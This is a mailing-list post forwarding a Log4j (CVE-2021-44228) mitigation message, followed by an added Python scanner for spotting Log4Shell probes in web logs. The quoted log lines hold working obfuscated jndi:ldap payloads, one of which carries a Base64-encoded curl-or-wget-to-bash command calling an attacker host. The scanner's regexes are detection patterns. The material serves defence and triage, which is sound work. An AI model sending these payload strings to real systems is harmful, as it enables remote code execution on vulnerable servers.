From: Dave Taht
Date: Mon, 13 Dec 2021 05:56:36 -0800
To: bloat
Subject: [Bloat] Fwd: Log4j mitigation
In-Reply-To: <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de>
X-BeenThere: bloat@lists.bufferbloat.net
List-Id: General list for discussing Bufferbloat

For those of you losing sleep over the Java logging exploit, my heart goes out to you. While I'm glad that I, personally, and the bufferbloat-related websites haven't got a single thing written in Java, and I lost 3 weeks of my life over Christmas to Spectre, and several weeks per year - and usually, right around Christmas! - coping with other CVEs.... this one seems so big and affects so many other services I use that I just kind of want to take all my cash out of the bank, log out, and find a tropic island somewhere.

---------- Forwarded message ---------
From: Jörg Kost
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent
Cc:

You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL), in headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port. It's not wormy right now, but maybe it will be soon. We have been seeing things like this since the 10th of Dec.
And this is only a typical Apache logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}

GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}

GET /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}

-- 
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht
CEO, TekLibre, LLC
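The log excerpts above show why a naive grep for "${jndi:" misses much of the traffic: the probes wrap each letter in ${lower:x}, use the ${::-x} default-value trick, or percent-encode the braces. The scanner below is an added example, not code from this thread or from the bufferbloat project. It undoes those three obfuscations until the text stops changing, flags any line that still contains a jndi: lookup, extracts the scheme and callback host, and decodes the /Base64/ command segment that the first excerpt carries in its LDAP path. The sample input is the three fragments quoted above (re-joined across the quoted-printable line breaks) plus one constructed benign request; the regexes, the 20-round normalization cap and the result dictionary layout are my own choices.

```python
"""Triage scanner for Log4Shell (CVE-2021-44228) probes in HTTP access logs.

Added example, not code from the mailing-list post. It undoes the cheap
obfuscations seen in the quoted log lines (${lower:x}, ${::-x}, %7B/%7D) so
that a plain search for "${jndi:" works again, then extracts the callback
target and decodes the /Base64/ command segment used by the exploit kits.
"""
import base64
import re
import urllib.parse
from typing import List, Optional, Tuple

# Sample input: the three fragments quoted in Jörg Kost's message (quoted-printable
# soft line breaks re-joined) plus one constructed benign request line.
SAMPLE_LINES = [
    "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic"
    "/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdn"
    "ZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}",
    'GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 '
    '"${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}',
    'GET /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} HTTP/1.1" 200 - '
    '"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}',
    'GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',  # constructed, benign
]

# ${lower:x} / ${upper:x}: innermost lookups only (no nested $ { } inside).
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${::-x}, ${env:NOPE:-x}, ${sys:foo:-x}: the default-value trick yields x.
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# ${jndi:<scheme>://<host>} where host may start with an unresolved ${hostName}.
_JNDI = re.compile(r'\$\{jndi:([a-z]+):/*((?:\$\{[^{}]*\})?[^/}\s"$]*)', re.IGNORECASE)
# Exploit-kit convention seen in the first excerpt: .../Command/Base64/<payload>.
_B64_CMD = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def normalize(text: str, max_rounds: int = 20) -> str:
    """Peel off percent-encoding, ${lower/upper:x} and ${...:-x} layers until
    the text stops changing (the round cap is an assumption against pathological input)."""
    for _ in range(max_rounds):
        new = urllib.parse.unquote(text)
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            new,
        )
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def decode_base64_command(text: str) -> Optional[str]:
    """Return the decoded /Base64/ command segment, or None if absent or invalid."""
    m = _B64_CMD.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for a line that carries a jndi: lookup after normalization, else None."""
    norm = normalize(line)
    hits = _JNDI.findall(norm)
    if not hits:
        return None
    return {
        "schemes": sorted({scheme.lower() for scheme, _ in hits}),
        "hosts": sorted({host for _, host in hits}),
        "obfuscated": norm != line,
        "decoded_command": decode_base64_command(norm),
    }


def scan_log(lines) -> List[Tuple[int, dict]]:
    """Scan an iterable of log lines; return (1-based line number, finding) pairs."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        finding = scan_line(line)
        if finding:
            findings.append((lineno, finding))
    return findings


if __name__ == "__main__":
    for lineno, finding in scan_log(SAMPLE_LINES):
        print(lineno, finding)
```

Run over the sample, the first line resolves to an ldap:// callback to 195.54.160.149:12344 and the Base64 segment decodes to a curl-or-wget-piped-to-bash one-liner, the second to dns:// beaconing (a scanner checking for vulnerability without a payload), and the third to an ldap:// lookup that leaks ${hostName} via the interactsh.com subdomain. Two caveats: the normalizer covers only the tricks visible in these excerpts, and Log4j lookups nest in other ways, so treat log scanning as triage for exposure and not as a substitute for upgrading Log4j or removing the JndiLookup class; and the lines above are what the web server logged, so anything a Java process logs from a header, body or URI that never reaches the access log will not be found this way.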